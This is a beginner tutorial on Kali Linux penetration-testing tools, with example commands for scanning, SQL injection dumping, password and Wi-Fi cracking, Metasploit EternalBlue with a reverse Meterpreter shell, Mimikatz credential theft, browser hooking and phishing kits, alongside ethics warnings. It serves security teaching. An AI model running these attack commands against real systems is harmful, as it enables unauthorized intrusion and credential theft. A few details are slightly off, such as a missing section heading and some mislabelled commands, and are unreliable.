Complete Kali Linux Tutorial with Tool Usage Examples

1. What is Kali Linux?
2. Installation and Setup
3. Basic Linux Commands
4. Information Gathering Tools
5. Vulnerability Analysis Tools
6. Web Application Analysis Tools
7. Password Attacks Tools
8. Wireless Attacks Tools
9. Exploitation Tools
10. Post-Exploitation Tools
11. Forensics Tools
12. Social Engineering Tools
13. Maintaining and Updating Kali
14. Ethical Considerations

1. What is Kali Linux?

Kali Linux is a Debian-based Linux distribution specifically designed for digital forensics and penetration testing. It's maintained and funded by Offensive Security. It comes pre-installed with hundreds of tools for various information security tasks, including:

Penetration Testing
Security Research
Computer Forensics
Reverse Engineering
Vulnerability Assessment

Kali Linux is widely used by cybersecurity professionals, ethical hackers, and security enthusiasts for testing the security of systems and networks.

2. Installation and Setup

The most common and recommended ways to use Kali Linux are:

Virtual Machine: Install on a hypervisor like VirtualBox or VMware Workstation/ESXi. This is the safest way as it isolates Kali from your host OS.
Dual Boot: Install alongside an existing operating system (e.g., Windows). Requires careful partitioning.
Live USB: Run directly from a USB drive without installation. Can be persistent (saves changes) or non-persistent.
Cloud: Deploy a Kali instance on cloud platforms like AWS or Azure.
WSL (Windows Subsystem for Linux): Run a Kali Linux environment directly on Windows 10/11.

Basic Setup Steps (Virtual Machine Example):

Download the official Kali Linux ISO from kali.org/get-kali/. Choose the appropriate architecture (64-bit).
Install VirtualBox or VMware Workstation on your host operating system.
Create a new virtual machine:
- Allocate sufficient RAM (e.g., 4GB or more).
- Allocate sufficient CPU cores (e.g., 2 cores).
- Create a virtual hard disk (e.g., 30GB or more, dynamically allocated).
- Mount the Kali Linux ISO as the virtual CD/DVD drive.
Start the VM and follow the graphical installation steps (choose "Graphical install").
During installation, choose network configuration, user setup, and partitioning.
After installation, remove the ISO from the virtual drive and reboot.

Install VirtualBox Guest Additions or VMware Tools for better integration (e.g., full screen, shared clipboard).

# For VirtualBox Guest Additions inside Kali VM:
sudo apt update
sudo apt install -y linux-headers-$(uname -r)
sudo mount /dev/cdrom /mnt
sudo /mnt/VBoxLinuxAdditions.run # Run the installer from the mounted ISO
sudo reboot

3. Basic Linux Commands

Familiarity with the Linux command line (Bash) is essential for using Kali Linux effectively.

`ls`: List directory contents.

ls -la # list all files, long format
ls /etc # list contents of /etc directory

`cd`: Change directory.

cd /opt/ # move to /opt directory
cd ..    # move up one directory
cd ~     # move to home directory

`pwd`: Print working directory.
`mkdir`: Make directory.
```
mkdir mytools
```

`rm`: Remove files or directories.

rm myfile.txt # remove a file
rm -r mydir   # remove a directory and its contents recursively

`cp`: Copy files or directories.

cp file1.txt /tmp/file1.txt
cp -r mydir /opt/newdir

`mv`: Move or rename files/directories.

mv oldname.txt newname.txt
mv file.txt /tmp/

`cat`: Concatenate and display file content.

cat /etc/passwd # display content of passwd file

`grep`: Search for patterns in files.

grep "root" /etc/passwd # find lines containing "root"

`man`: Display manual pages for commands.
```
man nmap # show manual for nmap tool
```

`sudo`: Execute a command as a superuser (root).

sudo apt update # update package lists with root privileges

`apt`: Package manager for Debian-based systems. Used for installing, updating, and removing software.

sudo apt update         # refresh package lists
sudo apt upgrade        # upgrade installed packages
sudo apt install toolname # install a new tool
sudo apt remove toolname # remove a tool

`ip a`: Display network interface information.
```
ip a # show IP addresses, network interfaces
```
`ping`: Test network connectivity to a host.
```
ping google.com
```
`ifconfig` (Legacy, use `ip a`): Display network interface information.

4. Information Gathering Tools

These tools are used in the reconnaissance phase to collect data about targets without directly interacting with them (passive) or with minimal interaction (active).

A. Nmap (Network Mapper)

A powerful open-source tool for network discovery and security auditing. It can discover hosts and services on a computer network by sending packets and analyzing the responses.

Basic Port Scan: Discover open ports and services on a target.

nmap <target_ip> # default scan of 1000 common ports
nmap -p 22,80,443 <target_ip> # scan specific ports
nmap -p- <target_ip> # scan all 65535 ports

Service Version Detection (`-sV`): Attempts to determine the service name and version running on open ports.
```
nmap -sV <target_ip>
```
OS Detection (`-O`): Attempts to determine the operating system of the target.
```
nmap -O <target_ip>
```
Aggressive Scan (`-A`): Enables OS detection, version detection, script scanning, and traceroute.
```
nmap -A <target_ip>
```

Script Scanning (`-sC` or `--script`): Runs default or specific Nmap Scripting Engine (NSE) scripts for various tasks (vulnerability detection, misconfiguration, discovery).

nmap -sC <target_ip> # run default scripts
nmap --script http-enum <target_ip> # enumerate web directories
nmap --script vuln <target_ip> # check for common vulnerabilities

B. Maltego

A powerful open-source intelligence (OSINT) and graphical link analysis tool for gathering and connecting information for forensic analysis or penetration testing.

Visualizes relationships between people, companies, domains, IP addresses, files, etc.
Uses "Transforms" to query various public data sources (DNS records, WHOIS, social media, etc.).

# Start Maltego from the applications menu: Information Gathering -> Maltego

Usage: Drag entities (e.g., a "Domain" entity) onto the graph, then right-click and run transforms (e.g., "To Emails from Domain," "To DNS Names").

C. theHarvester

Gathers open-source intelligence (OSINT) for a target domain, such as email addresses, subdomains, hosts, employee names, open ports, and banners.

theharvester -d example.com -l 500 -b google,linkedin,bing

# -d: target domain
# -l: limit the number of results
# -b: specify data sources (google, linkedin, bing, yahoo, shodan, etc.)

D. DNS Tools (dig, nslookup)

Used to query DNS (Domain Name System) servers for information about domain names, IP addresses, and other DNS records.

dig example.com MX        # Query MX (Mail Exchange) records
dig example.com ANY       # Query all record types
nslookup example.com      # Basic DNS lookup
nslookup -type=ns example.com # Query Name Server records

5. Vulnerability Analysis Tools

Tools used to identify weaknesses in systems, applications, and networks.

A. Nessus (Trial available) / OpenVAS

Vulnerability scanners that identify known vulnerabilities, misconfigurations, and compliance issues in systems and applications. OpenVAS is open-source and comes pre-installed.

OpenVAS (Greenbone Vulnerability Manager):
```
# Start OpenVAS services:
sudo gvm-start

# Access via web browser: https://127.0.0.1:9392 (default creds will be provided on first start)
```
Usage: Configure a scan target, create a new task, and run a scan. Review the generated reports for identified vulnerabilities and their severity.

B. Nmap (NSE Scripts)

As mentioned, Nmap's Scripting Engine (NSE) has many scripts for vulnerability detection.

nmap --script vuln <target_ip> # Runs common vulnerability detection scripts
nmap --script smtp-vuln-cve2010-4344 <target_ip> # Specific vulnerability check
nmap --script smb-vuln* <target_ip> # Check for SMB vulnerabilities

C. Nikto

A web server scanner that performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, outdated server versions, and version specific problems.

nikto -h http://example.com # Scan a web server
nikto -h https://example.com -ssl # Scan HTTPS
nikto -h example.com -port 80,443 # Scan specific ports

6. Web Application Analysis Tools

Tools designed to test the security of web applications.

A. Burp Suite Community Edition

An integrated platform for performing security testing of web applications. It includes various tools like a proxy, scanner, intruder, repeater, and decoder.

Proxy: Intercept, view, and modify HTTP/S traffic between your browser and the web server.
```
# Start Burp Suite from Applications -> Web Application Analysis -> Burp Suite
```
Usage: Configure your browser's proxy settings to point to Burp's proxy (default: 127.0.0.1:8080). Turn "Intercept is on" in Burp's Proxy tab to capture requests.
Repeater: Manually modify and resend individual HTTP requests, and analyze the responses.
Intruder: Automate customized attacks on web applications, such as brute-forcing, fuzzing, and credential stuffing.

B. OWASP ZAP (Zed Attack Proxy)

Another popular open-source web application security scanner. Similar to Burp Suite, it provides automated and manual testing capabilities.

# Start OWASP ZAP from Applications -> Web Application Analysis -> OWASP ZAP

Usage: Use its "Automated Scan" for quick checks or manually explore and analyze requests via its proxy.

C. SQLMap

An open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.

sqlmap -u "http://example.com/vuln_page.php?id=1" --dbs # enumerate databases
sqlmap -u "http://example.com/vuln_page.php?id=1" -D database_name --tables # enumerate tables
sqlmap -u "http://example.com/vuln_page.php?id=1" -D database_name -T table_name --dump # dump data from a table

Warning: Never use SQLMap on websites you do not have explicit permission to test, as it can cause damage to the database.

D. DirBuster / Gobuster / Ffuf

Tools used for brute-forcing directories and files on web servers to discover hidden web content.

# Gobuster example:
gobuster dir -u http://example.com -w /usr/share/wordlists/dirb/common.txt -x php,html,txt

# -u: target URL
# -w: wordlist to use
# -x: file extensions to look for

7. Password Attacks Tools

Tools for cracking password hashes, brute-forcing login forms, or generating wordlists.

A. Hashcat

The world's fastest password cracker, supporting a wide range of hashing algorithms and attack modes (brute-force, dictionary, hybrid, mask, etc.).

Crack MD5 hash with a wordlist:

hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt # -m 0 for MD5, -a 0 for dictionary attack

Crack WPA/WPA2 handshake:

hashcat -m 2500 -a 3 capture.hccapx -1 ?l?d ?1?1?1?1?1?1?1?1 # -m 2500 for WPA, -a 3 for brute-force mask

Note: Hashcat requires a GPU for optimal performance.

B. John the Ripper (JtR)

A fast password cracker, often used for UNIX password hashes, but capable of cracking many other hash types.

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

C. Hydra

A fast network logon cracker that supports numerous protocols to attack, including Telnet, FTP, HTTP, HTTPS, SMB, and many more.

hydra -L users.txt -P passwords.txt ssh://<target_ip> # SSH brute-force with user/pass lists
hydra -l admin -P passwords.txt ftp://<target_ip> # FTP brute-force with fixed user, pass list

D. CeWL

A custom wordlist generator that crawls a given URL, to a specified depth, optionally following external links, and returns a list of unique words. This can be used to create targeted wordlists for password cracking.

cewl -w mywordlist.txt -d 2 -m 5 http://example.com # crawl to depth 2, min word length 5

8. Wireless Attacks Tools

Tools for testing the security of wireless networks (Wi-Fi).

A. Aircrack-ng Suite

A complete suite of tools to assess Wi-Fi network security, including packet sniffing, WEP/WPA/WPA2 cracking, and fake access point creation.

Monitor Mode: Put your wireless adapter into monitor mode.

sudo airmon-ng check kill # Kill conflicting processes
sudo airmon-ng start wlan0 # Replace wlan0 with your wireless adapter name

Scan for Networks: Discover nearby Wi-Fi networks.

sudo airodump-ng wlan0mon # Scan using the monitor interface

Deauthentication Attack (for WPA Handshake Capture): Disconnect clients from an AP to capture the 4-way handshake.
```
sudo aireplay-ng --deauth 0 -a <BSSID_of_AP> -c <Client_MAC> wlan0mon
```
Crack WPA/WPA2 Handshake: Use aircrack-ng with a wordlist to crack the captured handshake.
```
aircrack-ng -w /usr/share/wordlists/rockyou.txt captured_handshake.cap
```

Warning: Using these tools on networks you do not own or have explicit permission to test is illegal and unethical. Ensure you are operating within a controlled lab environment.

B. Wifite2

An automated wireless attack tool that wraps many Aircrack-ng functions into a single, easy-to-use script.

sudo wifite --all # Attempts all known attacks against all nearby APs (use with extreme caution)
sudo wifite --wept --wpat --wps # Target WEP, WPA, and WPS enabled networks
sudo wifite --crack # Only crack captured handshakes

9. Exploitation Tools

Tools used to gain unauthorized access to a system by leveraging identified vulnerabilities.

A. Metasploit Framework

The most widely used open-source exploitation framework. It contains a massive database of exploits, payloads, and post-exploitation modules for various systems and services.

Start Metasploit Console:
```
msfconsole
```

Search for an exploit:

search ms17-010 # Search for EternalBlue exploit
search ftp backdoor

Use an exploit:

use exploit/windows/smb/ms17_010_eternalblue

Set Payload: A payload is the code that runs on the target after successful exploitation.

set PAYLOAD windows/meterpreter/reverse_tcp # Meterpreter is a powerful payload
# For Linux: set PAYLOAD linux/x64/meterpreter/reverse_tcp

Set Options: Define parameters like target IP (RHOSTS), listening IP (LHOST), listening port (LPORT).

set RHOSTS <target_ip>
set LHOST <your_kali_ip>
set LPORT 4444
show options # Review all set options

Exploit:
```
exploit
```

B. Browser Exploitation Framework (BeEF)

A penetration testing tool that focuses on the web browser. It's designed to demonstrate the impact of client-side vulnerabilities, often by hooking target browsers.

# Start BeEF:
sudo beef-xss

# Access BeEF UI: http://127.0.0.1:3000/ui/panel (default creds: beef / beef)

Usage: The BeEF UI provides instructions on injecting a "hook" into a web page. When a victim's browser loads the hooked page, BeEF gains control over that browser, allowing various client-side attacks (e.g., phishing, stealing cookies, network pivoting).

10. Post-Exploitation Tools

Tools used after gaining initial access to a system, typically to escalate privileges, maintain persistence, and collect data.

A. Meterpreter (from Metasploit)

A powerful, advanced payload within Metasploit that provides an interactive shell with numerous post-exploitation capabilities.

# After successful exploitation (in Metasploit console):
# Standard Meterpreter commands:
sysinfo                 # Get system information
getuid                  # Get current user ID
ps                      # List running processes
upload /path/to/local/file.txt C:\\windows\\temp\\ # Upload a file
download C:\\users\\victim\\secrets.txt /root/loot/ # Download a file
shell                   # Drop into a native system shell
migrate <process_id>    # Migrate to another process (for persistence)
getsystem               # Attempt to get SYSTEM privileges
hashdump                # Dump password hashes (requires elevated privileges)
screenshot              # Take a screenshot of the target desktop
record_mic -d 30        # Record 30 seconds from microphone

B. Mimikatz (Windows, often used with Meterpreter)

A post-exploitation tool that extracts plaintexts, hashes, PIN codes, and Kerberos tickets from memory. It is often crucial for credential theft on Windows systems.

# From a Meterpreter shell:
load kiwi           # Load the Mimikatz module (previously 'kiwi')
creds_all           # Show all credentials
sekurlsa::logonpasswords # Dump hashes/passwords from active logon sessions

C. BloodHound (Requires Neo4j database)

A tool that uses graph theory to reveal hidden and often unintended relationships within an Active Directory environment. It helps quickly identify complex attack paths for privilege escalation and lateral movement.

# Start Neo4j database service (if not running):
sudo neo4j start
# Run BloodHound:
bloodhound

# Ingest data using SharpHound.exe (from a compromised Windows machine) or BloodHound.py (from Kali/Linux)
# Example using BloodHound.py:
python3 bloodhound.py -c All -d example.local -u user@example.local -p Password123! --dns-servers 192.168.1.10

# Load the generated JSON files into BloodHound UI for visualization.

D. PowerShell Empire (Legacy but influential) / Covenant (Modern C2)

Post-exploitation frameworks that use PowerShell (Empire) or .NET (Covenant) for command and control (C2) and various post-exploitation modules, often designed for stealth.

# Start Covenant (requires .NET SDK on Kali):
# navigate to Covenant/Covenant/
dotnet run

# Access Covenant UI: https://127.0.0.1:7443/ (default creds: Admin / 123)
# Create a "Listener" (e.g., HTTP), generate a "Launcher" (payload),
# deploy the launcher on a target, then use "Grinders" to interact and run modules.

11. Forensics Tools

While Kali is primarily offensive, it includes tools useful for digital forensics (collecting and analyzing evidence after a security incident).

A. Autopsy

A comprehensive digital forensics platform that allows you to analyze disk images or logical drives. It's often used for incident response or criminal investigations.

autopsy # Start Autopsy UI

Usage: Create a new case, add a data source (disk image or local disk), and run various ingest modules to analyze file systems, web activity, emails, memory dumps, etc.

B. Wireshark

A powerful network protocol analyzer that lets you capture and interactively browse the data flowing on a computer network.

sudo wireshark # Start Wireshark GUI
# Or capture via command line:
sudo tcpdump -i eth0 -w capture.pcap # Capture traffic on eth0 to a file

Usage: Select an interface to capture (e.g., `eth0`), apply display filters (e.g., `http`, `ip.addr == 192.168.1.1`), and analyze packet data.

C. Volatility Framework

An open-source memory forensics framework for extracting digital artifacts from volatile memory (RAM) dumps.

# Common commands:
vol.py -f memdump.raw imageinfo # Determine OS and Service Pack of memory dump
vol.py -f memdump.raw --profile=Win7SP1x64 pslist # List running processes
vol.py -f memdump.raw --profile=Win7SP1x64 hashdump # Dump password hashes from memory

Tools designed to assist in human-based attacks, often leveraging deception to gain access or information.

A. Social-Engineer Toolkit (SET)

An open-source penetration testing framework designed for social engineering. It includes a variety of attack vectors, such as spear-phishing, web attack vectors, and infectious media generator.

setoolkit # Start SET

Usage: Follow the interactive menu to choose an attack (e.g., "Spear-Phishing Attack Vectors" -> "Credential Harvester Attack"). SET will guide you through setting up a malicious web page and sending emails.

Warning: Social engineering attacks can have significant real-world consequences and are often illegal without explicit, documented consent from the target organization. Always adhere to ethical guidelines.

B. GoPhish

An open-source phishing framework designed for businesses and penetration testers. It provides a simple and powerful way to conduct phishing campaigns, track results, and improve awareness.

# Start GoPhish (may require navigating to its directory and running the executable)
# Usually found in /opt/gophish/gophish
/opt/gophish/gophish # Run the GoPhish executable

# Access GoPhish UI: https://127.0.0.1:3333/ (default creds: admin / gophish)

Usage: Create landing pages, email templates, user groups, and then launch and monitor campaigns through the web interface.

13. Maintaining and Updating Kali

Keeping your Kali Linux installation updated is crucial for security and access to the latest tools.

Update Package Lists: Fetches the latest package information from the repositories.
```
sudo apt update
```
Upgrade Installed Packages: Installs newer versions of packages that you already have.
```
sudo apt upgrade
```
Full Upgrade (Recommended occasionally): Performs a full upgrade, handling dependency changes and removing obsolete packages.
```
sudo apt full-upgrade
```
Clean Up: Removes downloaded package files and old kernels to free up space.
```
sudo apt clean
sudo apt autoremove
```
Kernel Upgrade (if available):
```
sudo apt dist-upgrade
```
Kali-Specific Tool Updates: Some tools (especially those installed from GitHub) might require manual updates.

14. Ethical Considerations

Kali Linux is a powerful tool. It's essential to use it ethically and legally.

Always Obtain Explicit Permission: Never use Kali Linux or its tools to test systems you do not own or have written, explicit authorization to test. This includes personal websites, public Wi-Fi, or corporate networks.
Understand the Law: Familiarize yourself with local and international laws regarding computer crime (e.g., Computer Fraud and Abuse Act in the US, similar laws in other countries). Unauthorized access is illegal.
Scope of Work: If performing testing for a client, always adhere strictly to the agreed-upon Scope of Work (SOW) and Rules of Engagement (ROE).
Data Handling: If you gain access to sensitive data, treat it with the utmost confidentiality. Do not store, share, or misuse it.
Responsible Disclosure: If you find a vulnerability in a system you are authorized to test, follow responsible disclosure guidelines.
Continuous Learning: Stay updated with best practices, new tools, and the evolving legal landscape in cybersecurity.

Practice Makes Perfect!

Kali Linux is an invaluable asset for cybersecurity professionals. The best way to learn and master its tools is through hands-on practice in a safe, controlled environment. Set up a virtual lab with vulnerable systems (e.g., Metasploitable, OWASP Juice Shop) and practice responsibly. Remember, knowledge is power, and with great power comes great responsibility.